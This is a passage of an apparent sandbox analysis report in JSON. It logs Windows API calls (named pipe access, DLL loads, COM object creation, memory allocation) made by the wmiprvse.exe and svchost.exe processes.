"return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003e4" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\srvsvc" }, { "name": "FileInformationClass", "value": "23", "pretty_value": "FilePipeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 254 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003e4" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\srvsvc" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x02\\x00\\x00\\x00" } ], "repeated": 0, "id": 255 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003e4" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\srvsvc" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\xe6\\xa0+\\x1e\\x02\\x00\\x00" } ], "repeated": 0, "id": 256 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003e0" }, { "name": "DesiredAccess", "value": "0xc0100080", "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PIPE\\srvsvc" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 257 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003e0" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\srvsvc" }, { "name": "FileInformationClass", "value": "23", "pretty_value": "FilePipeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 258 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003e0" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\srvsvc" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x02\\x00\\x00\\x00" } ], "repeated": 0, "id": 259 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003e0" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\srvsvc" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xed\\xa0+\\x1e\\x02\\x00\\x00" } ], "repeated": 0, "id": 260 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "KERNEL32.DLL" }, { "name": "BaseAddress", "value": "0x7ffee1660000" } ], "repeated": 0, "id": 261 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003a4" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\ru-RU\\cimwin32.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 262 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003d8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0c0000" }, { "name": "SectionOffset", "value": "0x3f6827b8f0" }, { "name": "ViewSize", "value": "0x00003000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 263 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "OLEAUT32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2a80000" } ], "repeated": 0, "id": 264 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79ab0158d", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc55000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 265 }, { "timestamp": "2025-11-20 10:59:37,116", "thread_id": "4240", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000003a0" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 266 }, { "timestamp": "2025-11-20 11:00:33,772", "thread_id": "4280", "caller": "0x7ff79aaf8469", "parentcaller": "0x7ff79aaf8591", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba3e000" }, { "name": "RegionSize", "value": "0x00026000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 267 }, { "timestamp": "2025-11-20 11:00:33,772", "thread_id": "4280", "caller": "0x7ff79aaf9cfa", "parentcaller": "0x7ff79aafae26", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba2e000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 268 } ], "threads": [ "3424", "1388", "1260", "4244", "4248", "4240", "4280" ], "environ": { "UserName": "HOME-PC$", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x7ff79aaf0000", "MainExeSize": "0x0007e000", "Bitness": "64-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } }, { "process_id": 3212, "process_name": "svchost.exe", "parent_id": 600, "module_path": "C:\\Windows\\System32\\svchost.exe", "first_seen": "2025-11-20 10:58:31,678", "calls": [ { "timestamp": "2025-11-20 10:58:33,725", "thread_id": "3508", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000338-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 0 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "3508", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffed967359f", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wbemcore.dll" }, { "name": "BaseAddress", "value": "0x7ffed40d0000" } ], "repeated": 0, "id": 1 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "3508", "caller": "0x7ffed96735f7", "parentcaller": "0x7ffee2f7b20e", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4FA18276-912A-11D1-AD9B-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "00000000-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "3508", "caller": "0x7ffec7f83a1a", "parentcaller": "0x7ffed40e8f9b", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 3 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "3508", "caller": "0x7ffed95f2c1e", "parentcaller": "0x7ffed40e9057", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "44ACA674-E8FC-11D0-A07C-00C04FB68820" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "3508", "caller": "0x7ffed3fea4f0", "parentcaller": "0x7ffed3fea195", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "348", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000339-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "348", "caller": "0x7ffec7f84e9b", "parentcaller": "0x7ffec7f86a2f", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E" }, { "name": "ClsContext", "value": "0x00000005", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER" }, { "name": "riid", "value": "00000001-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 7 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "348", "caller": "0x7ffed40e6b2d", "parentcaller": "0x7ffec7f7cae0", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CD1ABFC8-6C5E-4A8D-B90B-2A3B153B886D" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "00000000-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 8 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "348", "caller": "0x7ffed3fea4f0", "parentcaller": "0x7ffed3fea195", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 9 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "348", "caller": "0x7ffec7f84e9b", "parentcaller": "0x7ffec7f86a2f", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E" }, { "name": "ClsContext", "value": "0x00000005", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER" }, { "name": "riid", "value": "00000001-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 10 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "3508", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 11 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "3804", "caller": "0x7ffedc212508", "parentcaller": "0x7ffedc214a51", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC" }, { "name": "ProgID", "value": "" } ], "repeated": 7, "id": 12 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "3508", "caller": "0x7ffed3fea4f0", "parentcaller": "0x7ffed3fcd5b5", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "3508", "caller": "0x7ffed40e8250", "parentcaller": "0x7ffee33bb583", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CC9072AB-C000-49D8-A5AA-00266C8DBB9B" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "368732C2-80D8-403E-854B-1B2BAFB9842C" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 14 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "348", "caller": "0x7ffec7f84e9b", "parentcaller": "0x7ffec7f86a2f", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E" }, { "name": "ClsContext", "value": "0x00000005", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER" }, { "name": "riid", "value": "00000001-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "348", "caller": "0x7ffed3feaddd", "parentcaller": "0x7ffed3fea3b7", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 16 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "348", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffed95eb50c", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0x000005d0" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000006fc" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "348", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffed95eb50c", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0x000005d0" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000006e4" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "3804", "caller": "0x7ffec7f82823", "parentcaller": "0x7ffec7f8978f", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E" }, { "name": "ClsContext", "value": "0x00000005", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER" }, { "name": "riid", "value": "00000001-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "3804", "caller": "0x7ffed3feaddd", "parentcaller": "0x7ffed3fea3b7", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 20 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "3804", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000006f0" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 21 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "3804", "caller": "0x7ffed3fea85f", "parentcaller": "0x7ffed3fea778", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 22 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "3804", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee2f66d2f", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000006e0" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 23 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "3508", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 24 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "3508", "caller": "0x7ffed3fea4f0", "parentcaller": "0x7ffed3fcd5b5", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 25 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "3508", "caller": "0x7ffed40e8250", "parentcaller": "0x7ffee33bb583", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CC9072AB-C000-49D8-A5AA-00266C8DBB9B" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "368732C2-80D8-403E-854B-1B2BAFB9842C" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 26 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "348", "caller": "0x7ffee10fbefb", "parentcaller": "0x7ffed5dea158", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000314" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\xc0\\x07\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 27 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "348", "caller": "0x7ffee10fbefb", "parentcaller": "0x7ffed5dea158", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000314" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\xe0\\x07\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 28 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "348", "caller": "0x7ffee10fbefb", "parentcaller": "0x7ffed5dea158", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000314" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 29 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "348", "caller": "0x7ffee10fbefb", "parentcaller": "0x7ffed5dea158", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000314" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00 h\\x01\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 30 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "348", "caller": "0x7ffed3fea4f0", "parentcaller": "0x7ffed3fea195", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 31 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4252", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000708" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 32 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "348", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffed95eb50c", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0x00000704" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x0000070c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 33 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "348", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffed95eb50c", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0x00000704" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000710" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 34 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "2480", "caller": "0x7ffec7f82823", "parentcaller": "0x7ffec7f7ffb3", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E" }, { "name": "ClsContext", "value": "0x00000005", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER" }, { "name": "riid", "value": "00000001-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 35 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "2480", "caller": "0x7ffed3feaddd", "parentcaller": "0x7ffed3fea3b7", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 36 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "2480", "caller": "0x7ffee10f6f4c", 